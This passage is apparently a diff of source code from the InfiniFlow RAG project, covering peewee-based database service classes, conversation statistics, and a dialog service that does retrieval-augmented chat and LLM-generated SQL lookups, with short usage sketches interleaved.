            peewee.fn.SUM(cls.model.duration).alias("duration"),
            peewee.fn.AVG(cls.model.round).alias("round"),
            peewee.fn.SUM(cls.model.thumb_up).alias("thumb_up")
        ).join(Dialog, on=(cls.model.dialog_id == Dialog.id & Dialog.tenant_id == tenant_id)).where(
            cls.model.create_date >= from_date,
            cls.model.create_date <= to_date
        ).group_by(cls.model.create_date.truncate("day")).dicts()

#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from datetime import datetime

import peewee

from api.db.db_models import DB, API4Conversation, APIToken, Dialog
from api.db.services.common_service import CommonService
from api.utils import current_timestamp, datetime_format


class APITokenService(CommonService):
    model = APIToken

    @classmethod
    @DB.connection_context()
    def used(cls, token):
        return cls.model.update({
            "update_time": current_timestamp(),
            "update_date": datetime_format(datetime.now()),
        }).where(
            cls.model.token == token
        )


class API4ConversationService(CommonService):
    model = API4Conversation

    @classmethod
    @DB.connection_context()
    def append_message(cls, id, conversation):
        cls.update_by_id(id, conversation)
        return cls.model.update(round=cls.model.round + 1).where(cls.model.id == id).execute()

    @classmethod
    @DB.connection_context()
    def stats(cls, tenant_id, from_date, to_date, source=None):
        if len(to_date) == 10:
            to_date += " 23:59:59"
        return cls.model.select(
            cls.model.create_date.truncate("day").alias("dt"),
            peewee.fn.COUNT(cls.model.id).alias("pv"),
            peewee.fn.COUNT(cls.model.user_id.distinct()).alias("uv"),
            peewee.fn.SUM(cls.model.tokens).alias("tokens"),
            peewee.fn.SUM(cls.model.duration).alias("duration"),
            peewee.fn.AVG(cls.model.round).alias("round"),
            peewee.fn.SUM(cls.model.thumb_up).alias("thumb_up")
        ).join(Dialog, on=((cls.model.dialog_id == Dialog.id) & (Dialog.tenant_id == tenant_id))).where(
            cls.model.create_date >= from_date,
            cls.model.create_date <= to_date,
            cls.model.source == source
        ).group_by(cls.model.create_date.truncate("day")).dicts()
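
A usage sketch for the revised stats() (the tenant id and dates are placeholders): a bare to_date is padded to end-of-day, and rows come back as dicts keyed by the aliases above.

for r in API4ConversationService.stats("tenant-uuid", "2024-06-01", "2024-06-30", source=None):
    print(r["dt"], r["pv"], r["uv"], r["tokens"], r["thumb_up"])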

api/db/services/canvas_service.py (new file, 26 lines)
@ -0,0 +1,26 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from datetime import datetime
import peewee
from api.db.db_models import DB, API4Conversation, APIToken, Dialog, CanvasTemplate, UserCanvas
from api.db.services.common_service import CommonService


class CanvasTemplateService(CommonService):
    model = CanvasTemplate


class UserCanvasService(CommonService):
    model = UserCanvas
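
Both services are empty shells on purpose: every CRUD method (save, get_by_id, update_by_id, filter_delete, ...) is inherited from CommonService, shown in the next hunk. A usage sketch with an assumed template id and field name:

ok, tpl = CanvasTemplateService.get_by_id("template-uuid")
if ok:
    CanvasTemplateService.update_by_id(tpl.id, {"title": "Renamed"})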
@ -1,183 +1,183 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from datetime import datetime

import peewee

from api.db.db_models import DB
from api.utils import datetime_format, current_timestamp, get_uuid


class CommonService:
    model = None

    @classmethod
    @DB.connection_context()
    def query(cls, cols=None, reverse=None, order_by=None, **kwargs):
        return cls.model.query(cols=cols, reverse=reverse,
                               order_by=order_by, **kwargs)

    @classmethod
    @DB.connection_context()
    def get_all(cls, cols=None, reverse=None, order_by=None):
        if cols:
            query_records = cls.model.select(*cols)
        else:
            query_records = cls.model.select()
        if reverse is not None:
            if not order_by or not hasattr(cls, order_by):
                order_by = "create_time"
            if reverse is True:
                query_records = query_records.order_by(
                    cls.model.getter_by(order_by).desc())
            elif reverse is False:
                query_records = query_records.order_by(
                    cls.model.getter_by(order_by).asc())
        return query_records

    @classmethod
    @DB.connection_context()
    def get(cls, **kwargs):
        return cls.model.get(**kwargs)

    @classmethod
    @DB.connection_context()
    def get_or_none(cls, **kwargs):
        try:
            return cls.model.get(**kwargs)
        except peewee.DoesNotExist:
            return None

    @classmethod
    @DB.connection_context()
    def save(cls, **kwargs):
        # if "id" not in kwargs:
        #     kwargs["id"] = get_uuid()
        sample_obj = cls.model(**kwargs).save(force_insert=True)
        return sample_obj

    @classmethod
    @DB.connection_context()
    def insert(cls, **kwargs):
        if "id" not in kwargs:
            kwargs["id"] = get_uuid()
        kwargs["create_time"] = current_timestamp()
        kwargs["create_date"] = datetime_format(datetime.now())
        kwargs["update_time"] = current_timestamp()
        kwargs["update_date"] = datetime_format(datetime.now())
        sample_obj = cls.model(**kwargs).save(force_insert=True)
        return sample_obj

    @classmethod
    @DB.connection_context()
    def insert_many(cls, data_list, batch_size=100):
        with DB.atomic():
            for d in data_list:
                d["create_time"] = current_timestamp()
                d["create_date"] = datetime_format(datetime.now())
            for i in range(0, len(data_list), batch_size):
                cls.model.insert_many(data_list[i:i + batch_size]).execute()

    @classmethod
    @DB.connection_context()
    def update_many_by_id(cls, data_list):
        with DB.atomic():
            for data in data_list:
                data["update_time"] = current_timestamp()
                data["update_date"] = datetime_format(datetime.now())
                cls.model.update(data).where(
                    cls.model.id == data["id"]).execute()

    @classmethod
    @DB.connection_context()
    def update_by_id(cls, pid, data):
        data["update_time"] = current_timestamp()
        data["update_date"] = datetime_format(datetime.now())
        num = cls.model.update(data).where(cls.model.id == pid).execute()
        return num

    @classmethod
    @DB.connection_context()
    def get_by_id(cls, pid):
        try:
            obj = cls.model.query(id=pid)[0]
            return True, obj
        except Exception as e:
            return False, None

    @classmethod
    @DB.connection_context()
    def get_by_ids(cls, pids, cols=None):
        if cols:
            objs = cls.model.select(*cols)
        else:
            objs = cls.model.select()
        return objs.where(cls.model.id.in_(pids))

    @classmethod
    @DB.connection_context()
    def delete_by_id(cls, pid):
        return cls.model.delete().where(cls.model.id == pid).execute()

    @classmethod
    @DB.connection_context()
    def filter_delete(cls, filters):
        with DB.atomic():
            num = cls.model.delete().where(*filters).execute()
            return num

    @classmethod
    @DB.connection_context()
    def filter_update(cls, filters, update_data):
        with DB.atomic():
            return cls.model.update(update_data).where(*filters).execute()

    @staticmethod
    def cut_list(tar_list, n):
        length = len(tar_list)
        arr = range(length)
        result = [tuple(tar_list[x:(x + n)]) for x in arr[::n]]
        return result

    @classmethod
    @DB.connection_context()
    def filter_scope_list(cls, in_key, in_filters_list,
                          filters=None, cols=None):
        in_filters_tuple_list = cls.cut_list(in_filters_list, 20)
        if not filters:
            filters = []
        res_list = []
        if cols:
            for i in in_filters_tuple_list:
                query_records = cls.model.select(*cols).where(
                    getattr(cls.model, in_key).in_(i), *filters)
                if query_records:
                    res_list.extend(
                        [query_record for query_record in query_records])
        else:
            for i in in_filters_tuple_list:
                query_records = cls.model.select().where(
                    getattr(cls.model, in_key).in_(i), *filters)
                if query_records:
                    res_list.extend(
                        [query_record for query_record in query_records])
        return res_list
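
filter_scope_list chunks the id list with cut_list so each SQL IN clause stays at 20 elements; a sketch of the chunking itself:

# cut_list([1, 2, 3, 4, 5], 2) -> [(1, 2), (3, 4), (5,)]
assert CommonService.cut_list([1, 2, 3, 4, 5], 2) == [(1, 2), (3, 4), (5,)]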
@ -1,301 +1,482 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import re
from copy import deepcopy

from api.db import LLMType
from api.db.db_models import Dialog, Conversation
from api.db.services.common_service import CommonService
from api.db.services.knowledgebase_service import KnowledgebaseService
from api.db.services.llm_service import LLMService, TenantLLMService, LLMBundle
from api.settings import chat_logger, retrievaler
from rag.app.resume import forbidden_select_fields4resume
from rag.nlp.search import index_name
from rag.utils import rmSpace, num_tokens_from_string, encoder


class DialogService(CommonService):
    model = Dialog


class ConversationService(CommonService):
    model = Conversation


def message_fit_in(msg, max_length=4000):
    def count():
        nonlocal msg
        tks_cnts = []
        for m in msg:
            tks_cnts.append(
                {"role": m["role"], "count": num_tokens_from_string(m["content"])})
        total = 0
        for m in tks_cnts:
            total += m["count"]
        return total

    c = count()
    if c < max_length:
        return c, msg

    msg_ = [m for m in msg[:-1] if m["role"] == "system"]
    msg_.append(msg[-1])
    msg = msg_
    c = count()
    if c < max_length:
        return c, msg

    ll = num_tokens_from_string(msg_[0].content)
    l = num_tokens_from_string(msg_[-1].content)
    if ll / (ll + l) > 0.8:
        m = msg_[0].content
        m = encoder.decode(encoder.encode(m)[:max_length - l])
        msg[0].content = m
        return max_length, msg

    m = msg_[1].content
    m = encoder.decode(encoder.encode(m)[:max_length - l])
    msg[1].content = m
    return max_length, msg


def chat(dialog, messages, stream=True, **kwargs):
    assert messages[-1]["role"] == "user", "The last content of this conversation is not from user."
    llm = LLMService.query(llm_name=dialog.llm_id)
    if not llm:
        llm = TenantLLMService.query(tenant_id=dialog.tenant_id, llm_name=dialog.llm_id)
        if not llm:
            raise LookupError("LLM(%s) not found" % dialog.llm_id)
        max_tokens = 1024
    else:
        max_tokens = llm[0].max_tokens
    kbs = KnowledgebaseService.get_by_ids(dialog.kb_ids)
    embd_nms = list(set([kb.embd_id for kb in kbs]))
    if len(embd_nms) != 1:
        yield {"answer": "**ERROR**: Knowledge bases use different embedding models.", "reference": []}
        return {"answer": "**ERROR**: Knowledge bases use different embedding models.", "reference": []}

    questions = [m["content"] for m in messages if m["role"] == "user"]
    embd_mdl = LLMBundle(dialog.tenant_id, LLMType.EMBEDDING, embd_nms[0])
    chat_mdl = LLMBundle(dialog.tenant_id, LLMType.CHAT, dialog.llm_id)

    prompt_config = dialog.prompt_config
    field_map = KnowledgebaseService.get_field_map(dialog.kb_ids)
    # try to use sql if field mapping is good to go
    if field_map:
        chat_logger.info("Use SQL to retrieval:{}".format(questions[-1]))
        ans = use_sql(questions[-1], field_map, dialog.tenant_id, chat_mdl, prompt_config.get("quote", True))
        if ans:
            yield ans
            return

    for p in prompt_config["parameters"]:
        if p["key"] == "knowledge":
            continue
        if p["key"] not in kwargs and not p["optional"]:
            raise KeyError("Miss parameter: " + p["key"])
        if p["key"] not in kwargs:
            prompt_config["system"] = prompt_config["system"].replace(
                "{%s}" % p["key"], " ")

    for _ in range(len(questions) // 2):
        questions.append(questions[-1])
    if "knowledge" not in [p["key"] for p in prompt_config["parameters"]]:
        kbinfos = {"total": 0, "chunks": [], "doc_aggs": []}
    else:
        kbinfos = retrievaler.retrieval(" ".join(questions), embd_mdl, dialog.tenant_id, dialog.kb_ids, 1, dialog.top_n,
                                        dialog.similarity_threshold,
                                        dialog.vector_similarity_weight,
                                        doc_ids=kwargs["doc_ids"].split(",") if "doc_ids" in kwargs else None,
                                        top=1024, aggs=False)
    knowledges = [ck["content_with_weight"] for ck in kbinfos["chunks"]]
    chat_logger.info(
        "{}->{}".format(" ".join(questions), "\n->".join(knowledges)))

    if not knowledges and prompt_config.get("empty_response"):
        yield {"answer": prompt_config["empty_response"], "reference": kbinfos}
        return {"answer": prompt_config["empty_response"], "reference": kbinfos}

    kwargs["knowledge"] = "\n".join(knowledges)
    gen_conf = dialog.llm_setting
    msg = [{"role": m["role"], "content": m["content"]}
           for m in messages if m["role"] != "system"]
    used_token_count, msg = message_fit_in(msg, int(max_tokens * 0.97))
    if "max_tokens" in gen_conf:
        gen_conf["max_tokens"] = min(
            gen_conf["max_tokens"],
            max_tokens - used_token_count)

    def decorate_answer(answer):
        nonlocal prompt_config, knowledges, kwargs, kbinfos
        if knowledges and (prompt_config.get("quote", True) and kwargs.get("quote", True)):
            answer, idx = retrievaler.insert_citations(answer,
                                                       [ck["content_ltks"]
                                                        for ck in kbinfos["chunks"]],
                                                       [ck["vector"]
                                                        for ck in kbinfos["chunks"]],
                                                       embd_mdl,
                                                       tkweight=1 - dialog.vector_similarity_weight,
                                                       vtweight=dialog.vector_similarity_weight)
            idx = set([kbinfos["chunks"][int(i)]["doc_id"] for i in idx])
            recall_docs = [
                d for d in kbinfos["doc_aggs"] if d["doc_id"] in idx]
            if not recall_docs: recall_docs = kbinfos["doc_aggs"]
            kbinfos["doc_aggs"] = recall_docs

        refs = deepcopy(kbinfos)
        for c in refs["chunks"]:
            if c.get("vector"):
                del c["vector"]
        if answer.lower().find("invalid key") >= 0 or answer.lower().find("invalid api") >= 0:
            answer += " Please set LLM API-Key in 'User Setting -> Model Providers -> API-Key'"
        return {"answer": answer, "reference": refs}

    if stream:
        answer = ""
        for ans in chat_mdl.chat_streamly(prompt_config["system"].format(**kwargs), msg, gen_conf):
            answer = ans
            yield {"answer": answer, "reference": {}}
        yield decorate_answer(answer)
    else:
        answer = chat_mdl.chat(
            prompt_config["system"].format(
                **kwargs), msg, gen_conf)
        chat_logger.info("User: {}|Assistant: {}".format(
            msg[-1]["content"], answer))
        yield decorate_answer(answer)


def use_sql(question, field_map, tenant_id, chat_mdl, quota=True):
    sys_prompt = "你是一个DBA。你需要针对以下表的字段结构,根据用户的问题列表,写出最后一个问题对应的SQL。"
    user_promt = """
表名:{};
数据库表字段说明如下:
{}

问题如下:
{}
请写出SQL, 且只要SQL,不要有其他说明及文字。
""".format(
        index_name(tenant_id),
        "\n".join([f"{k}: {v}" for k, v in field_map.items()]),
        question
    )
    tried_times = 0

    def get_table():
        nonlocal sys_prompt, user_promt, question, tried_times
        sql = chat_mdl.chat(sys_prompt, [{"role": "user", "content": user_promt}], {
            "temperature": 0.06})
        print(user_promt, sql)
        chat_logger.info(f"“{question}”==>{user_promt} get SQL: {sql}")
        # Normalize the LLM output down to a bare, single-line SELECT statement.
        sql = re.sub(r"[\r\n]+", " ", sql.lower())
        sql = re.sub(r".*select ", "select ", sql.lower())
        sql = re.sub(r" +", " ", sql)
        sql = re.sub(r"([;;]|```).*", "", sql)
        if sql[:len("select ")] != "select ":
            return None, None
        if not re.search(r"((sum|avg|max|min)\(|group by )", sql.lower()):
            if sql[:len("select *")] != "select *":
                sql = "select doc_id,docnm_kwd," + sql[6:]
            else:
                flds = []
                for k in field_map.keys():
                    if k in forbidden_select_fields4resume:
                        continue
                    if len(flds) > 11:
                        break
                    flds.append(k)
                sql = "select doc_id,docnm_kwd," + ",".join(flds) + sql[8:]

        print(f"“{question}” get SQL(refined): {sql}")

        chat_logger.info(f"“{question}” get SQL(refined): {sql}")
        tried_times += 1
        return retrievaler.sql_retrieval(sql, format="json"), sql

    tbl, sql = get_table()
    if tbl is None:
        return None
    if tbl.get("error") and tried_times <= 2:
        user_promt = """
表名:{};
数据库表字段说明如下:
{}

问题如下:
{}

你上一次给出的错误SQL如下:
{}

后台报错如下:
{}

请纠正SQL中的错误再写一遍,且只要SQL,不要有其他说明及文字。
""".format(
            index_name(tenant_id),
            "\n".join([f"{k}: {v}" for k, v in field_map.items()]),
            question, sql, tbl["error"]
        )
        tbl, sql = get_table()
        chat_logger.info("TRY it again: {}".format(sql))

    chat_logger.info("GET table: {}".format(tbl))
    print(tbl)
    if tbl.get("error") or len(tbl["rows"]) == 0:
        return None

    docid_idx = set([ii for ii, c in enumerate(
        tbl["columns"]) if c["name"] == "doc_id"])
    docnm_idx = set([ii for ii, c in enumerate(
        tbl["columns"]) if c["name"] == "docnm_kwd"])
    clmn_idx = [ii for ii in range(
        len(tbl["columns"])) if ii not in (docid_idx | docnm_idx)]

    # compose markdown table
    clmns = "|" + "|".join([re.sub(r"(/.*|([^()]+))", "", field_map.get(tbl["columns"][i]["name"],
                                                                        tbl["columns"][i]["name"])) for i in clmn_idx]) + ("|Source|" if docid_idx and docnm_idx else "|")

    line = "|" + "|".join(["------" for _ in range(len(clmn_idx))]) + \
           ("|------|" if docid_idx and docnm_idx else "")

    rows = ["|" +
            "|".join([rmSpace(str(r[i])) for i in clmn_idx]).replace("None", " ") +
            "|" for r in tbl["rows"]]
    if quota:
        rows = "\n".join([r + f" ##{ii}$$ |" for ii, r in enumerate(rows)])
    else:
        rows = "\n".join([r + f" ##{ii}$$ |" for ii, r in enumerate(rows)])
    rows = re.sub(r"T[0-9]{2}:[0-9]{2}:[0-9]{2}(\.[0-9]+Z)?\|", "|", rows)

    if not docid_idx or not docnm_idx:
        chat_logger.warning("SQL missing field: " + sql)
        return {
            "answer": "\n".join([clmns, line, rows]),
            "reference": {"chunks": [], "doc_aggs": []}
        }

    docid_idx = list(docid_idx)[0]
    docnm_idx = list(docnm_idx)[0]
    doc_aggs = {}
    for r in tbl["rows"]:
        if r[docid_idx] not in doc_aggs:
            doc_aggs[r[docid_idx]] = {"doc_name": r[docnm_idx], "count": 0}
        doc_aggs[r[docid_idx]]["count"] += 1
    return {
        "answer": "\n".join([clmns, line, rows]),
        "reference": {"chunks": [{"doc_id": r[docid_idx], "docnm_kwd": r[docnm_idx]} for r in tbl["rows"]],
                      "doc_aggs": [{"doc_id": did, "doc_name": d["doc_name"], "count": d["count"]} for did, d in doc_aggs.items()]}
    }

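When the SQL path succeeds, use_sql short-circuits chat() with an already-rendered markdown table. A sketch of the returned shape (all values here are illustrative placeholders):

{
    "answer": "|Name|Age|Source|\n|------|------|------|\n|Tom|28| ##0$$ |",
    "reference": {"chunks": [{"doc_id": "...", "docnm_kwd": "..."}],
                  "doc_aggs": [{"doc_id": "...", "doc_name": "...", "count": 1}]},
}
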
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import binascii
import os
import json
import re
from copy import deepcopy
from timeit import default_timer as timer
from api.db import LLMType, ParserType
from api.db.db_models import Dialog, Conversation
from api.db.services.common_service import CommonService
from api.db.services.knowledgebase_service import KnowledgebaseService
from api.db.services.llm_service import LLMService, TenantLLMService, LLMBundle
from api.settings import chat_logger, retrievaler, kg_retrievaler
from rag.app.resume import forbidden_select_fields4resume
from rag.nlp import keyword_extraction
from rag.nlp.search import index_name
from rag.utils import rmSpace, num_tokens_from_string, encoder
from api.utils.file_utils import get_project_base_directory


class DialogService(CommonService):
    model = Dialog


class ConversationService(CommonService):
    model = Conversation


def message_fit_in(msg, max_length=4000):
    def count():
        nonlocal msg
        tks_cnts = []
        for m in msg:
            tks_cnts.append(
                {"role": m["role"], "count": num_tokens_from_string(m["content"])})
        total = 0
        for m in tks_cnts:
            total += m["count"]
        return total

    c = count()
    if c < max_length:
        return c, msg

    msg_ = [m for m in msg[:-1] if m["role"] == "system"]
    msg_.append(msg[-1])
    msg = msg_
    c = count()
    if c < max_length:
        return c, msg

    ll = num_tokens_from_string(msg_[0]["content"])
    l = num_tokens_from_string(msg_[-1]["content"])
    if ll / (ll + l) > 0.8:
        m = msg_[0]["content"]
        m = encoder.decode(encoder.encode(m)[:max_length - l])
        msg[0]["content"] = m
        return max_length, msg

    m = msg_[1]["content"]
    m = encoder.decode(encoder.encode(m)[:max_length - l])
    msg[1]["content"] = m
    return max_length, msg
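
message_fit_in keeps the system messages plus the latest turn and, if the total is still over budget, token-truncates the longer side with the shared encoder. A usage sketch (the message contents are placeholders):

msg = [{"role": "system", "content": long_system_prompt},
       {"role": "user", "content": question}]
used_tokens, msg = message_fit_in(msg, max_length=4000)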


def llm_id2llm_type(llm_id):
    fnm = os.path.join(get_project_base_directory(), "conf")
    llm_factories = json.load(open(os.path.join(fnm, "llm_factories.json"), "r"))
    for llm_factory in llm_factories["factory_llm_infos"]:
        for llm in llm_factory["llm"]:
            if llm_id == llm["llm_name"]:
                # model_type may be a comma-joined list such as
                # "image2text,chat"; use the last entry as the effective type.
                return llm["model_type"].strip(",").split(",")[-1]
|
||||
def chat(dialog, messages, stream=True, **kwargs):
    assert messages[-1]["role"] == "user", "The last content of this conversation is not from user."
    st = timer()
    llm = LLMService.query(llm_name=dialog.llm_id)
    if not llm:
        llm = TenantLLMService.query(tenant_id=dialog.tenant_id, llm_name=dialog.llm_id)
        if not llm:
            raise LookupError("LLM(%s) not found" % dialog.llm_id)
        max_tokens = 8192
    else:
        max_tokens = llm[0].max_tokens
    kbs = KnowledgebaseService.get_by_ids(dialog.kb_ids)
    embd_nms = list(set([kb.embd_id for kb in kbs]))
    if len(embd_nms) != 1:
        yield {"answer": "**ERROR**: Knowledge bases use different embedding models.", "reference": []}
        return {"answer": "**ERROR**: Knowledge bases use different embedding models.", "reference": []}

    is_kg = all([kb.parser_id == ParserType.KG for kb in kbs])
    retr = retrievaler if not is_kg else kg_retrievaler

    questions = [m["content"] for m in messages if m["role"] == "user"][-3:]
    attachments = kwargs["doc_ids"].split(",") if "doc_ids" in kwargs else None
    if "doc_ids" in messages[-1]:
        attachments = messages[-1]["doc_ids"]
        for m in messages[:-1]:
            if "doc_ids" in m:
                attachments.extend(m["doc_ids"])

    embd_mdl = LLMBundle(dialog.tenant_id, LLMType.EMBEDDING, embd_nms[0])
    if llm_id2llm_type(dialog.llm_id) == "image2text":
        chat_mdl = LLMBundle(dialog.tenant_id, LLMType.IMAGE2TEXT, dialog.llm_id)
    else:
        chat_mdl = LLMBundle(dialog.tenant_id, LLMType.CHAT, dialog.llm_id)

    prompt_config = dialog.prompt_config
    field_map = KnowledgebaseService.get_field_map(dialog.kb_ids)
    tts_mdl = None
    if prompt_config.get("tts"):
        tts_mdl = LLMBundle(dialog.tenant_id, LLMType.TTS)
    # Try SQL retrieval first if a field mapping is available.
    if field_map:
        chat_logger.info("Use SQL to retrieve: {}".format(questions[-1]))
        ans = use_sql(questions[-1], field_map, dialog.tenant_id, chat_mdl, prompt_config.get("quote", True))
        if ans:
            yield ans
            return

    for p in prompt_config["parameters"]:
        if p["key"] == "knowledge":
            continue
        if p["key"] not in kwargs and not p["optional"]:
            raise KeyError("Missing parameter: " + p["key"])
        if p["key"] not in kwargs:
            prompt_config["system"] = prompt_config["system"].replace(
                "{%s}" % p["key"], " ")

    rerank_mdl = None
    if dialog.rerank_id:
        rerank_mdl = LLMBundle(dialog.tenant_id, LLMType.RERANK, dialog.rerank_id)

    # Duplicate the latest question so it weighs more in retrieval.
    for _ in range(len(questions) // 2):
        questions.append(questions[-1])
    if "knowledge" not in [p["key"] for p in prompt_config["parameters"]]:
        kbinfos = {"total": 0, "chunks": [], "doc_aggs": []}
    else:
        if prompt_config.get("keyword", False):
            questions[-1] += keyword_extraction(chat_mdl, questions[-1])
        kbinfos = retr.retrieval(" ".join(questions), embd_mdl, dialog.tenant_id, dialog.kb_ids, 1, dialog.top_n,
                                 dialog.similarity_threshold,
                                 dialog.vector_similarity_weight,
                                 doc_ids=attachments,
                                 top=dialog.top_k, aggs=False, rerank_mdl=rerank_mdl)
    knowledges = [ck["content_with_weight"] for ck in kbinfos["chunks"]]
    chat_logger.info(
        "{}->{}".format(" ".join(questions), "\n->".join(knowledges)))
    retrieval_tm = timer()

    if not knowledges and prompt_config.get("empty_response"):
        empty_res = prompt_config["empty_response"]
        yield {"answer": empty_res, "reference": kbinfos, "audio_binary": tts(tts_mdl, empty_res)}
        return {"answer": prompt_config["empty_response"], "reference": kbinfos}

    kwargs["knowledge"] = "\n------\n".join(knowledges)
    gen_conf = dialog.llm_setting

    msg = [{"role": "system", "content": prompt_config["system"].format(**kwargs)}]
    msg.extend([{"role": m["role"], "content": re.sub(r"##\d+\$\$", "", m["content"])}
                for m in messages if m["role"] != "system"])
    used_token_count, msg = message_fit_in(msg, int(max_tokens * 0.97))
    assert len(msg) >= 2, f"message_fit_in has bug: {msg}"
    prompt = msg[0]["content"]

    if "max_tokens" in gen_conf:
        gen_conf["max_tokens"] = min(
            gen_conf["max_tokens"],
            max_tokens - used_token_count)

    def decorate_answer(answer):
        nonlocal prompt_config, knowledges, kwargs, kbinfos, prompt, retrieval_tm
        refs = []
        if knowledges and (prompt_config.get("quote", True) and kwargs.get("quote", True)):
            answer, idx = retr.insert_citations(answer,
                                                [ck["content_ltks"]
                                                 for ck in kbinfos["chunks"]],
                                                [ck["vector"]
                                                 for ck in kbinfos["chunks"]],
                                                embd_mdl,
                                                tkweight=1 - dialog.vector_similarity_weight,
                                                vtweight=dialog.vector_similarity_weight)
            idx = set([kbinfos["chunks"][int(i)]["doc_id"] for i in idx])
            recall_docs = [
                d for d in kbinfos["doc_aggs"] if d["doc_id"] in idx]
            if not recall_docs:
                recall_docs = kbinfos["doc_aggs"]
            kbinfos["doc_aggs"] = recall_docs

            refs = deepcopy(kbinfos)
            for c in refs["chunks"]:
                if c.get("vector"):
                    del c["vector"]

        if answer.lower().find("invalid key") >= 0 or answer.lower().find("invalid api") >= 0:
            answer += " Please set LLM API-Key in 'User Setting -> Model Providers -> API-Key'"
        done_tm = timer()
        # Measure the LLM phase from the end of retrieval, not from st,
        # so the two elapsed figures do not overlap.
        prompt += "\n### Elapsed\n - Retrieval: %.1f ms\n - LLM: %.1f ms" % (
            (retrieval_tm - st) * 1000, (done_tm - retrieval_tm) * 1000)
        return {"answer": answer, "reference": refs, "prompt": prompt}

    if stream:
        last_ans = ""
        answer = ""
        for ans in chat_mdl.chat_streamly(prompt, msg[1:], gen_conf):
            answer = ans
            delta_ans = ans[len(last_ans):]
            # Batch tiny deltas so TTS and the client are not flooded.
            if num_tokens_from_string(delta_ans) < 16:
                continue
            last_ans = answer
            yield {"answer": answer, "reference": {}, "audio_binary": tts(tts_mdl, delta_ans)}
        delta_ans = answer[len(last_ans):]
        if delta_ans:
            yield {"answer": answer, "reference": {}, "audio_binary": tts(tts_mdl, delta_ans)}
        yield decorate_answer(answer)
    else:
        answer = chat_mdl.chat(prompt, msg[1:], gen_conf)
        chat_logger.info("User: {}|Assistant: {}".format(
            msg[-1]["content"], answer))
        res = decorate_answer(answer)
        res["audio_binary"] = tts(tts_mdl, answer)
        yield res


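# --- Usage sketch (illustrative; not part of the original module) ---
# `chat` is a generator: it streams progressively longer answers and yields
# the citation-decorated result last. Assuming a Dialog ORM object `dialog`:
#
#     messages = [{"role": "user", "content": "Summarize the Q3 report."}]
#     final = None
#     for chunk in chat(dialog, messages, stream=True):
#         final = chunk
#         print(chunk["answer"])   # whole answer so far, not a delta
#     print(final["reference"], final["prompt"])

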
def use_sql(question, field_map, tenant_id, chat_mdl, quota=True):
    # Prompts are kept in Chinese as shipped; rough translation: "You are a
    # DBA. Given the table schema below and the user's list of questions,
    # write the SQL for the last question. Output the SQL only, nothing else."
    sys_prompt = "你是一个DBA。你需要针对以下表的字段结构,根据用户的问题列表,写出最后一个问题对应的SQL。"
    user_prompt = """
表名:{};
数据库表字段说明如下:
{}

问题如下:
{}
请写出SQL, 且只要SQL,不要有其他说明及文字。
""".format(
        index_name(tenant_id),
        "\n".join([f"{k}: {v}" for k, v in field_map.items()]),
        question
    )
    tried_times = 0

    def get_table():
        nonlocal sys_prompt, user_prompt, question, tried_times
        sql = chat_mdl.chat(sys_prompt, [{"role": "user", "content": user_prompt}], {
            "temperature": 0.06})
        chat_logger.info(f"“{question}”==>{user_prompt} get SQL: {sql}")
        # Normalize the generated SQL: strip newlines, anything before the
        # SELECT, repeated spaces, and trailing semicolons or code fences.
        sql = re.sub(r"[\r\n]+", " ", sql.lower())
        sql = re.sub(r".*select ", "select ", sql.lower())
        sql = re.sub(r" +", " ", sql)
        sql = re.sub(r"([;;]|```).*", "", sql)
        if sql[:len("select ")] != "select ":
            return None, None
        if not re.search(r"((sum|avg|max|min)\(|group by )", sql.lower()):
            # Plain row queries must carry doc_id/docnm_kwd so results can be
            # linked back to their source documents.
            if sql[:len("select *")] != "select *":
                sql = "select doc_id,docnm_kwd," + sql[6:]
            else:
                flds = []
                for k in field_map.keys():
                    if k in forbidden_select_fields4resume:
                        continue
                    if len(flds) > 11:
                        break
                    flds.append(k)
                sql = "select doc_id,docnm_kwd," + ",".join(flds) + sql[8:]

        chat_logger.info(f"“{question}” get SQL(refined): {sql}")
        tried_times += 1
        return retrievaler.sql_retrieval(sql, format="json"), sql

    tbl, sql = get_table()
    if tbl is None:
        return None
    if tbl.get("error") and tried_times <= 2:
        # Retry once, feeding the failed SQL and the backend error back to the
        # model. Rough translation of the prompt: "... Your previous, incorrect
        # SQL and the backend error are shown below; correct the SQL and write
        # it again. Output the SQL only, nothing else."
        user_prompt = """
表名:{};
数据库表字段说明如下:
{}

问题如下:
{}

你上一次给出的错误SQL如下:
{}

后台报错如下:
{}
